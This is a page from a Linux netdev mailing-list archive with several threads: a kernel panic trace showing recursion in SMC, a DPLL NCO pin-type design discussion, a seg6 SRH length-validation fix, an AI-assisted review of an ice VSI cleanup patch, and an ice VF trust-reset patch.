[ 1453.563200][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.563244][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[... 15+ recursive frames ...]
[ 1453.564373][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.564413][ C0] smc_tcp_syn_recv_sock+0x435/0xb10
[ 1453.577027][ C0] RIP: 0033:0x423574
[ 1453.577319][ C0] Kernel panic - not syncing: Fatal exception in
interrupt
The infinite recursion is visible in the repeated
smc_tcp_syn_recv_sock+0x435/0xb10 frames — each iteration calls
ori_af_ops->syn_recv_sock(), which is itself, pushing a new frame
until the IRQ stack guard page is hit.
Thanks,
Xiao
^ permalink raw reply
* Re: [PATCH net-next v5 1/4] dpll: add DPLL_PIN_TYPE_INT_NCO pin type
From: Jiri Pirko @ 2026-06-23 10:37 UTC (permalink / raw)
To: Ivan Vecera
Cc: Kubalewski, Arkadiusz, Vadim Fedorenko, Jakub Kicinski,
netdev@vger.kernel.org, Jiri Pirko, David S. Miller,
Donald Hunter, Eric Dumazet, Schmidt, Michal, Paolo Abeni,
Vaananen, Pasi, Oros, Petr, Prathosh Satish, Simon Horman,
linux-kernel@vger.kernel.org
In-Reply-To: <23e47140-f69f-451d-9154-29071130c11c@redhat.com>
Fri, Jun 19, 2026 at 07:07:52PM +0200, ivecera@redhat.com wrote:
>On 6/17/26 1:59 PM, Kubalewski, Arkadiusz wrote:
>> > From: Ivan Vecera <ivecera@redhat.com>
>> > Sent: Monday, June 15, 2026 2:00 PM
>> >
>> > On 6/11/26 2:09 PM, Jiri Pirko wrote:
>> > > Wed, Jun 10, 2026 at 05:45:46PM +0200, ivecera@redhat.com wrote:
>> > > > On 6/10/26 3:04 PM, Kubalewski, Arkadiusz wrote:
>> > > > > > From: Ivan Vecera <ivecera@redhat.com>
>> > > > > > Sent: Tuesday, June 9, 2026 4:59 PM
>> > > > > >
>> > > > > > On 6/9/26 4:00 PM, Kubalewski, Arkadiusz wrote:
>> > > > > > > > From: Jiri Pirko <jiri@resnulli.us>
>> > > > > > > > Sent: Tuesday, June 9, 2026 10:51 AM
>> > > > > > > >
>> > > > > > > > Mon, Jun 08, 2026 at 07:03:46PM +0200,
>> > > > > > > > arkadiusz.kubalewski@intel.com
>> > > > > > > > wrote:
>> > > > > > > > > > From: Ivan Vecera <ivecera@redhat.com>
>> > > > > > > > > > Sent: Monday, June 8, 2026 5:48 PM
>> > > > > > > > > >
>> > > > > > > > > > On 6/8/26 4:43 PM, Kubalewski, Arkadiusz wrote:
>> > > > > > > > > > > > From: Ivan Vecera <ivecera@redhat.com>
>> > > > > > > > > > > > Sent: Sunday, May 31, 2026 9:44 PM ...
>> > > > > > > > > > > > -
>> > > > > > > > > > > > name: gnss
>> > > > > > > > > > > > doc: GNSS recovered clock
>> > > > > > > > > > > > + -
>> > > > > > > > > > > > + name: int-nco
>> > > > > > > > > > > > + doc: |
>> > > > > > > > > > > > + Device internal numerically controlled oscillator.
>> > > > > > > > > > > > + When connected as a DPLL input, the DPLL enters NCO
>> > > > > > > > > > > > mode
>> > > > > > > > > > > > + where the output frequency is adjusted by the host
>> > > > > > > > > > > > via
>> > > > > > > > > > > > + the PTP clock interface.
>> > > > > > > > > > >
>> > > > > > > > > > > Hi Ivan!
>> > > > > > > > > > >
>> > > > > > > > > > > How would you control this in case of automatic mode dpll?
>> > > > > > > > > > > Automatic mode DPLL shall be controlled on HW level, such pin
>> > > > > > > > > > > brakes that rule and requires some driver magic to show it is
>> > > > > > > > > > > higher priority then the rest of the pins?
>> > > > > > > > > >
>> > > > > > > > > > The NCO pin can be connected only in manual mode. In other words
>> > > > > > > > > > a
>> > > > > > > > > > DPLL in automatic mode cannot select NCO pin (switch to NCO mode)
>> > > > > > > > > > by
>> > > > > > > > > > its own.
>> > > > > > > > > >
>> > > > > > > > >
>> > > > > > > > > Being picky on DPLL_MODE for enabling feature is not something we
>> > > > > > > > > can allow if it is not related to HW limitation, is it?
>> > > > > > > > > Could you please elaborate why it is not possible for AUTOMATIC
>> > > > > > > > > mode?
>> > > > > > > >
>> > > > > > > > In automatic mode, the pin selection logic is defined upon prio. I
>> > > > > > > > can imagine that if NCO pin has the highest prio of the available
>> > > > > > > > ones, it gets picked. I would be aligned 100% with automatic mode
>> > > > > > > > behaviour.
>> > > > > > > > Is there a real usecase for it?
>> > > > > > > >
>> > > > > > > > [..]
>> > > > > > >
>> > > > > > > This is not true. AUTOMATIC mode is HW solution, SW driver ONLY
>> > > > > > > configures priorities on the inputs, not manages the active inputs.
>> > > > > > > This brakes that behavior, the SW driver would have to manually
>> > > > > > > override the AUTMATIC mode to be fed from such NCO pin as it doesn't
>> > > > > > > exists on it's priority list, HW cannot pick or use it.
>> > > > > >
>> > > > > > Correct, AUTO mode is hardware feature and it should not be emulated
>> > > > > > by a
>> > > > > > driver. If the hardware does not support it then the switching
>> > > > > > between
>> > > > > > input references should be done by userspace (by monitoring ffo,
>> > > > > > phase_offset, operstate).
>> > > > > >
>> > > > >
>> > > > > Yes, exactly, so for AUTOMATIC mode HW it will not be possible to
>> > > > > create
>> > > > > such pin, which means that NCO pin would serve only a MANUAL mode
>> > > > > implementation.
>> > > > > Basically this is something we shall not allow to happen. DPLL API
>> > > > > should be designed to cover the case where AUTO mode is able to
>> > > > > implement
>> > > > > all features consistently.
>> > > >
>> > > > If you don't like the proposal from Jiri (NCO switch driven by NCO pin
>> > > > priority -> highest==enter_nco else leave_nco) then it could be
>> > > > possible
>> > > > to handle the switching by allowing the state 'connected' in AUTO mode
>> > > > for the NCO pin type. Then the implementation will be the same for both
>> > > > selection modes.
>> > > >
>> > > > Only difference would be that a user does not need to switch the device
>> > > >from the AUTO to MANUAL mode.
>> > > >
>> > > > > > > The real use case is that any DPLL can switch the mode to this one
>> > > > > > > instead of implementing MANUAL mode just to use the feature with a
>> > > > > > > 'virtual' pin.
>> > > > > >
>> > > > > > I don't expect this... but it is up to a driver. I don't plan such
>> > > > > > functionality in zl3073x as the NCO pin does not expose prio_get()
>> > > > > > and
>> > > > > > prio_set() callbacks - so it is clear that this pin cannot be part of
>> > > > > > the
>> > > > > > automatic selection.
>> > > > > >
>> > > > > > Ivan
>> > > > >
>> > > > > There is a difference between particular HW and API capabilities, with
>> > > > > the
>> > > > > proposed API we would disallow the possibility of such implementation
>> > > > > for
>> > > > > existing HW variants.
>> > > > >
>> > > > > DPLL NCO MODE would allow that but as pointed here by Ivan and by Jiri
>> > > > > in
>> > > > > the other email it would also require the extra implementation for
>> > > > > some
>> > > > > configuration - device level phase/ffo handling.
>> > > > >
>> > > > > To summarize it all, I don't have such simple solution for it.
>> > > > >
>> > > > > First thing that comes to my mind is to combine both approaches.
>> > > > > Make it possible for AUTMATIC mode to also set "CONNECTED" state
>> > > > > on certain kind of "OVERRIDE" pins, where it could be determined by
>> > > > > the type of PIN and embed that logic into the DPLL subsystem.
>> > > >
>> > > > The possible states for particual pins are now handled at a driver
>> > > > level
>> > > > so the driver decides if the requested state is correct or not. So it
>> > > > could be easy to implement this.
>> > > >
>> > > > For auto mode allowed states:
>> > > > - input references: selectable / disconnected
>> > > > - nco pin: connected / disconnected
>> > > >
>> > > > > Basically, if driver registers such NCO pin it would be always
>> > > > > selected
>> > > > > manually, and in such case all the other pins are going to
>> > > > > disconnected
>> > > > > state while DPLL mode is also a "OVERRIDE" or something like it.
>> > > >
>> > > > I would leave this decision on the driver level... Imagine the
>> > > > potential
>> > > > HW that would allow to switch NCO mode if there is no valid input
>> > > > reference.
>> > > >
>> > > > Example:
>> > > >
>> > > > REF0 (prio 0) -> +------+ -> OUT0
>> > > > REF1 (prio 1) -> | DPLL | -> ...
>> > > > NCO (prio 2) -> +------+ -> OUTn
>> > > >
>> > > > Such HW would prefer REF0 or REF1 and lock to one of them if they are
>> > > > qualified. But if they are NOT, then it switches to NCO mode.
>>
>> Now you said yourself "NCO mode" ... I agree that it would be a mode in
>> that case. Where instead of running on regular/built in XO dpll would run
>> on NCO and user could select it, and this would be addition to regular
>> behavior.
>>
>> I also agree that the pin approach might be better/easier to use, assuming
>> frequency offset for all the outputs given dpll drives, it makes more sense
>> to have it configurable on input side.
>
>+1
>
>> > > >
>> > > > In this situation the relevant driver would allow to configure priority
>> > > > and state 'selectable' for this NCO pin.
>> > > >
>> > > > > Perhaps the pin type could include OVERRIDE in it's name to make it
>> > > > > less
>> > > > > confusing and needs some extra documentation.
>> > > > >
>> > > > > Thoughts?
>> > > > I think _INT_ is ok. In the case of TYPE_INT_OSCILLATOR it is also
>> > > > obvious that it is not a standard input reference.
>> > > >
>> > > > Jiri, Vadim, Arek, thoughts?
>> > >
>> > > I agree with you, the driver should have the flexibility to implement
>> > > this according to his/hw's needs/capabilities. If it implements prio
>> > > selection in AUTO mode, let it have it. If it implements manual NCO pin
>> > > selection in AUTO mode using connected/disconnected override, let it
>> > > have it.
>>
>> I don't know 'current' HW that is capable of using AUTO mode as a part of
>> HW-based priority source selection and use such NCO input..
>> But as already explained above, this is special mode of regular XO, which
>> allows DPLL's output frequency offset configuration.
>
>Lets keep this available for potential future HW. I can imagine a
>situation where a user will prefer an automatic switch to NCO mode
>if there is no qualified input reference - automatic switch means
>that HW will support this (not emulated by the driver).
>
>> > >
>> > > Moreover, I actually like the "override" capability for pins in AUTO
>> > > mode in general. It may be handy for other usecases as well.
>> > >
>> > Arek? Vadim?
>> >
>> > Thanks,
>> > Ivan
>>
>> Agree, 'override' capability of a pin would be the way to go for this and
>> other similar further cases.
>>
>> I believe a single approach on this would be best, I mean if AUTO mode
>> needs a capability, to switch from regular behavior to 'OVERRIDE', and
>> 'OVERRIDE' is only pin capability that allows such behavior for AUTO
>> mode, then similar approach should be used on MANUAL mode, to make
>> userspace know that such pin is always available to set "CONNECTED"
>> and make the userspace implementation consistent on enabling it no matter
>> if AUTO or MANUAL mode dpll.
>
>Proposal:
>1) new pin capability
> - name: state-connected-override
> - doc: pin state can be changed to connected in any DPLL mode
Needs a bit more description I think in real patch.
>
>2) new NCO pin type to switch the DPLL to NCO mode when connected
Say "NCO hw mode" to avoid confusion (I already spotted such a bit
earlier in this thread)
>
>3) automatic-only DPLL
> - should expose NCO pin with state-connected-override capability
>
>4) manual-only DPLL
> - does not need to expose NCO pin with state-connected-override cap
>
>5) dual-mode DPLL (supporting mode switching)
> - if it exposes NCO pin with the override cap then it has to support
> switching to NCO mode directly from AUTO mode
> - if does not expose NCO pin with the override cap then a user MUST
> switch the DPLL mode from AUTO to MANUAL to be able to make NCO
> pin connected to the DPLL
>
>Vadim, Jiri, Arek - thoughts?
Agreed.
>
>Thanks,
>Ivan
>
^ permalink raw reply
* [PATCH net v2] seg6: validate SRH length before reading fixed fields
From: Nuoqi Gui @ 2026-06-23 10:32 UTC (permalink / raw)
To: David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
Simon Horman, Andrea Mayer
Cc: netdev, bpf, linux-kernel, Nuoqi Gui, Mathieu Xhonneux,
Daniel Borkmann, David Lebrun
seg6_validate_srh() reads fixed SRH fields such as srh->type and
srh->hdrlen before checking that the supplied length covers the fixed
struct ipv6_sr_hdr fields.
The BPF SEG6 encap path reaches this with a BPF program-supplied pointer
and length: bpf_lwt_push_encap() and the SEG6 local BPF END_B6 and
END_B6_ENCAP actions call bpf_push_seg6_encap(), which forwards the
length to seg6_validate_srh() with no minimum-size guard. A 2-byte SEG6
encap header can therefore make the validator read srh->type at offset 2
beyond the caller-supplied buffer.
Reject lengths shorter than the fixed SRH at the top of
seg6_validate_srh(), before any field is read. This fixes the BPF helper
path and keeps the common validator robust.
Fixes: fe94cc290f53 ("bpf: Add IPv6 Segment Routing helpers")
Signed-off-by: Nuoqi Gui <gnq25@mails.tsinghua.edu.cn>
---
Changes in v2:
- Narrowed the commit message to the BPF encap callers that can supply a
too-short SRH length.
- Dropped the unnecessary cast in the minimum SRH length check.
- Link to v1: https://patch.msgid.link/20260620-f01-17-seg6-srh-len-v1-1-36cbb29c12f1@mails.tsinghua.edu.cn
To: Andrea Mayer <andrea.mayer@uniroma2.it>
To: "David S. Miller" <davem@davemloft.net>
To: Eric Dumazet <edumazet@google.com>
To: Jakub Kicinski <kuba@kernel.org>
To: Paolo Abeni <pabeni@redhat.com>
To: Simon Horman <horms@kernel.org>
To: Mathieu Xhonneux <m.xhonneux@gmail.com>
To: Daniel Borkmann <daniel@iogearbox.net>
To: David Lebrun <dlebrun@google.com>
Cc: netdev@vger.kernel.org
Cc: linux-kernel@vger.kernel.org
Cc: bpf@vger.kernel.org
---
net/ipv6/seg6.c | 3 +++
1 file changed, 3 insertions(+)
diff --git a/net/ipv6/seg6.c b/net/ipv6/seg6.c
index 1c3ad25700c4c..62a7eb7792026 100644
--- a/net/ipv6/seg6.c
+++ b/net/ipv6/seg6.c
@@ -29,6 +29,9 @@ bool seg6_validate_srh(struct ipv6_sr_hdr *srh, int len, bool reduced)
int max_last_entry;
int trailing;
+ if (len < sizeof(*srh))
+ return false;
+
if (srh->type != IPV6_SRCRT_TYPE_4)
return false;
---
base-commit: 96e7f9122aae0ed000ee321f324b812a447906d9
change-id: 20260619-f01-17-seg6-srh-len-a85f35427e0b
Best regards,
--
Nuoqi Gui <gnq25@mails.tsinghua.edu.cn>
^ permalink raw reply related
* Re: [PATCH iwl-net] ice: clear the default forwarding VSI rule when releasing a VSI
From: Simon Horman @ 2026-06-23 10:29 UTC (permalink / raw)
To: poros
Cc: Simon Horman, netdev, anthony.l.nguyen, przemyslaw.kitszel,
andrew+netdev, davem, edumazet, kuba, pabeni, jacob.e.keller,
michal.swiatkowski, intel-wired-lan, linux-kernel
In-Reply-To: <20260622081030.2312129-1-poros@redhat.com>
This is an AI-generated review of your patch. The human sending this
email has considered the AI review valid, or at least plausible.
Full review at: https://sashiko.dev
---
ice: clear the default forwarding VSI rule when releasing a VSI
This patch restores the cleanup of the default forwarding VSI rule
in ice_vsi_release(), clearing it when the VSI owns it. This prevents
a rule leak if a trusted VF enters promiscuous mode and is then destroyed.
> diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c
> --- a/drivers/net/ethernet/intel/ice/ice_lib.c
> +++ b/drivers/net/ethernet/intel/ice/ice_lib.c
> @@ -2871,6 +2871,9 @@ int ice_vsi_release(struct ice_vsi *vsi)
> return -ENODEV;
> pf = vsi->back;
>
> + if (ice_is_vsi_dflt_vsi(vsi))
> + ice_clear_dflt_vsi(vsi);
> +
[Severity: High]
Is there a time-of-check to time-of-use race here?
ice_is_vsi_dflt_vsi() acquires and releases the filt_rule_lock to check if
the current VSI is the default. If true, ice_clear_dflt_vsi() is called,
which acquires the lock again during rule removal.
If the lock is dropped between these two calls, could another thread
establish a new default VSI rule before ice_clear_dflt_vsi() runs?
When ice_clear_dflt_vsi() executes, it appears the rule search only matches
by l_data and flag:
ice_switch.c:ice_find_rule_entry() {
if (!memcmp(&f_info->l_data, &list_itr->fltr_info.l_data,
sizeof(f_info->l_data)) &&
f_info->flag == list_itr->fltr_info.flag) {
...
}
For the default VSI rule, l_data is empty, so it might match any newly
established default rule.
And since ice_remove_rule_internal() does not appear to validate the
vsi_handle for non-list rules:
ice_switch.c:ice_remove_rule_internal() {
if (list_elem->fltr_info.fltr_act != ICE_FWD_TO_VSI_LIST) {
remove_rule = true;
...
}
Could this blindly remove the default forwarding configuration for a
completely unrelated VSI?
> if (test_bit(ICE_FLAG_RSS_ENA, pf->flags))
> ice_rss_clean(vsi);
^ permalink raw reply
* [PATCH net v7 4/4] ice: skip unnecessary VF reset when setting trust
From: Jose Ignacio Tornos Martinez @ 2026-06-23 10:18 UTC (permalink / raw)
To: netdev
Cc: intel-wired-lan, przemyslaw.kitszel, aleksandr.loktionov,
jacob.e.keller, horms, anthony.l.nguyen, davem, edumazet, kuba,
pabeni, Jose Ignacio Tornos Martinez
In-Reply-To: <20260623101800.991293-1-jtornosm@redhat.com>
Similar to the i40e fix, ice_set_vf_trust() unconditionally calls
ice_reset_vf() when the trust setting changes. While the delay is smaller
than i40e, this reset is still unnecessary in most cases.
When granting trust, no reset is needed - we can just set the capability
flag to allow privileged operations.
When revoking trust, we only need to reset (conservative approach) if
the VF has actually configured advanced features that require cleanup
(MAC LLDP filters, promiscuous mode). For VFs in a clean state, we can
safely change the trust setting without the disruptive reset.
When we do reset, we maintain the original ice pattern that has been
reliable in production: cleanup LLDP filters first, then set vf->trusted,
then reset. This ensures the privilege capability bit is handled correctly
during reset rebuild.
When we don't reset, we manually handle the capability flag via helper
function, eliminating the delay.
Signed-off-by: Jose Ignacio Tornos Martinez <jtornosm@redhat.com>
Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com>
---
v7: Rebase on current net tree (no code changes from v6)
v6: https://lore.kernel.org/all/20260619061321.8554-5-jtornosm@redhat.com/
drivers/net/ethernet/intel/ice/ice_sriov.c | 33 +++++++++++++++++++---
1 file changed, 29 insertions(+), 4 deletions(-)
diff --git a/drivers/net/ethernet/intel/ice/ice_sriov.c b/drivers/net/ethernet/intel/ice/ice_sriov.c
index 7e00e091756d..XXXXXXXXXXXXXXXX 100644
--- a/drivers/net/ethernet/intel/ice/ice_sriov.c
+++ b/drivers/net/ethernet/intel/ice/ice_sriov.c
@@ -1364,6 +1364,23 @@ int ice_set_vf_mac(struct net_device *netdev, int vf_id, u8 *mac)
return __ice_set_vf_mac(ice_netdev_to_pf(netdev), vf_id, mac);
}
+/**
+ * ice_setup_vf_trust - Enable/disable VF trust mode without reset
+ * @vf: VF to configure
+ * @setting: trust setting
+ *
+ * Update VF flags when changing trust without performing a VF reset.
+ * This is only called when it's safe to skip the reset (VF has no advanced
+ * features configured that need cleanup).
+ */
+static void ice_setup_vf_trust(struct ice_vf *vf, bool setting)
+{
+ if (setting)
+ set_bit(ICE_VIRTCHNL_VF_CAP_PRIVILEGE, &vf->vf_caps);
+ else
+ clear_bit(ICE_VIRTCHNL_VF_CAP_PRIVILEGE, &vf->vf_caps);
+}
+
/**
* ice_set_vf_trust
* @netdev: network interface device structure
@@ -1399,11 +1416,19 @@ int ice_set_vf_trust(struct net_device *netdev, int vf_id, bool trusted)
mutex_lock(&vf->cfg_lock);
- while (!trusted && vf->num_mac_lldp)
- ice_vf_update_mac_lldp_num(vf, ice_get_vf_vsi(vf), false);
-
+ /* Reset only if revoking trust and VF has advanced features configured */
+ if (!trusted &&
+ (vf->num_mac_lldp > 0 ||
+ test_bit(ICE_VF_STATE_UC_PROMISC, vf->vf_states) ||
+ test_bit(ICE_VF_STATE_MC_PROMISC, vf->vf_states))) {
+ while (vf->num_mac_lldp)
+ ice_vf_update_mac_lldp_num(vf, ice_get_vf_vsi(vf), false);
+ vf->trusted = trusted;
+ ice_reset_vf(vf, ICE_VF_RESET_NOTIFY);
+ } else {
+ vf->trusted = trusted;
+ ice_setup_vf_trust(vf, trusted);
+ }
- vf->trusted = trusted;
- ice_reset_vf(vf, ICE_VF_RESET_NOTIFY);
dev_info(ice_pf_to_dev(pf), "VF %u is now %strusted\n",
vf_id, trusted ? "" : "un");
--
2.43.0
^ permalink raw reply
page: next (older) | prev (newer) | latest
- recent:[subjects (threaded)|topics (new)|topics (active)]
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox